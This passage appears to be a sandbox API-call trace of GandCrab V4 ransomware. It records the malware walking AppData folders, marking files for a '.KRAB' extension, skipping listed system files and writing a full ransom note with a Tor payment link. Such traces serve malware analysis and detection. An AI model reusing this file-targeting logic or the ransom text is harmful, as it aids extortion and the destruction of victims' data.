lpOverlapped=0x0) returned 1 [0056.988] CloseHandle (hObject=0x430) returned 1 [0056.988] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.988] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.989] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x4, wMilliseconds=0xba)) [0056.989] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.989] GetWindowsDirectoryW (in: lpBuffer=0x35f0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0056.989] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x35f0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x35f0600, lpMaximumComponentLength=0x35f0608, lpFileSystemFlags=0x35f0604, lpFileSystemNameBuffer=0x35f0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x35f0600*=0xd2ca4def, lpMaximumComponentLength=0x35f0608*=0xff, lpFileSystemFlags=0x35f0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0056.989] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\d2ca4a08d2ca4dee3d.lock") returned 81 [0056.989] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\logtransport2\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x430 [0056.990] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.990] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.990] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\") returned 58 [0056.990] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\*" [0056.991] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbe0a0 [0056.991] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.991] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0056.991] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0056.991] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.991] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0056.991] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0056.991] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0056.991] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\d2ca4a08d2ca4dee3d.lock" [0056.991] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.991] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 86 [0056.991] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\d2ca4a08d2ca4dee3d.lock") returned 81 [0056.991] lstrlenW (lpString=".lock") returned 5 [0056.991] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.992] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".lock ") returned 6 [0056.992] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.992] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.992] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0056.992] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0056.992] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0056.992] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\KRAB-DECRYPT.txt" [0056.993] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.993] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\KRAB-DECRYPT.txt.KRAB") returned 79 [0056.993] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\KRAB-DECRYPT.txt") returned 74 [0056.993] lstrlenW (lpString=".txt") returned 4 [0056.993] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.993] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".txt ") returned 5 [0056.993] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.994] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\KRAB-DECRYPT.txt") returned 74 [0056.994] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\KRAB-DECRYPT.txt") returned 74 [0056.994] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0056.994] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0056.994] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0056.994] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0056.994] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0056.994] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0056.994] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0056.994] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0056.994] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0056.994] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0056.994] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.994] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0056.994] lstrcmpW (lpString1="Logs", lpString2=".") returned 1 [0056.994] lstrcmpW (lpString1="Logs", lpString2="..") returned 1 [0056.994] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpString2="Logs" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs" [0056.994] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\" [0056.995] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0056.995] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0056.995] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0056.995] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0056.995] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0056.995] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.995] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.998] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\\\KRAB-DECRYPT.txt") returned 80 [0056.998] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\logtransport2\\logs\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0056.999] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0056.999] WriteFile (in: hFile=0x44c, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e820, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e820*=0x1f6e, lpOverlapped=0x0) returned 1 [0056.999] CloseHandle (hObject=0x44c) returned 1 [0057.000] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.000] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0057.000] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x4, wMilliseconds=0xca)) [0057.000] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0057.001] GetWindowsDirectoryW (in: lpBuffer=0x35f0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0057.001] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x35f0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x35f0600, lpMaximumComponentLength=0x35f0608, lpFileSystemFlags=0x35f0604, lpFileSystemNameBuffer=0x35f0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x35f0600*=0xd2ca4def, lpMaximumComponentLength=0x35f0608*=0xff, lpFileSystemFlags=0x35f0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0057.001] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\d2ca4a08d2ca4dee3d.lock") returned 86 [0057.001] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\logtransport2\\logs\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x44c [0057.010] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.010] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.011] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\") returned 63 [0057.011] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\*" [0057.011] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\*", lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0xfbdce0 [0057.011] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.011] FindNextFileW (in: hFindFile=0xfbdce0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0057.011] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0057.011] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.011] FindNextFileW (in: hFindFile=0xfbdce0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0057.011] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0057.012] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0057.012] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\d2ca4a08d2ca4dee3d.lock" [0057.012] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0057.012] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 91 [0057.012] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\d2ca4a08d2ca4dee3d.lock") returned 86 [0057.012] lstrlenW (lpString=".lock") returned 5 [0057.012] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0057.012] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".lock ") returned 6 [0057.012] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.013] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.013] FindNextFileW (in: hFindFile=0xfbdce0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0057.013] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0057.013] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0057.013] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\KRAB-DECRYPT.txt" [0057.013] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0057.013] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\KRAB-DECRYPT.txt.KRAB") returned 84 [0057.013] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\KRAB-DECRYPT.txt") returned 79 [0057.013] lstrlenW (lpString=".txt") returned 4 [0057.014] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0057.014] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".txt ") returned 5 [0057.014] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.014] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\KRAB-DECRYPT.txt") returned 79 [0057.014] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\KRAB-DECRYPT.txt") returned 79 [0057.014] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0057.014] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0057.014] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0057.014] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0057.014] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0057.014] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0057.014] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0057.015] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0057.015] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0057.015] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0057.015] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.015] FindNextFileW (in: hFindFile=0xfbdce0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0 [0057.015] FindClose (in: hFindFile=0xfbdce0 | out: hFindFile=0xfbdce0) returned 1 [0057.015] CloseHandle (hObject=0x44c) returned 1 [0057.015] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0057.015] lstrcmpW (lpString1="LogTransport2.cfg", lpString2=".") returned 1 [0057.015] lstrcmpW (lpString1="LogTransport2.cfg", lpString2="..") returned 1 [0057.015] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpString2="LogTransport2.cfg" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg" [0057.015] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0057.016] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg.KRAB") returned 80 [0057.016] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg") returned 75 [0057.016] lstrlenW (lpString=".cfg") returned 4 [0057.016] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0057.016] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".cfg ") returned 5 [0057.016] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.016] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg") returned 75 [0057.017] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg") returned 75 [0057.017] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="desktop.ini") returned 1 [0057.017] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="autorun.inf") returned 1 [0057.017] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="ntuser.dat") returned -1 [0057.017] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="iconcache.db") returned 1 [0057.017] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="bootsect.bak") returned 1 [0057.017] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="boot.ini") returned 1 [0057.017] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="ntuser.dat.log") returned -1 [0057.017] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="thumbs.db") returned -1 [0057.017] lstrcmpiW 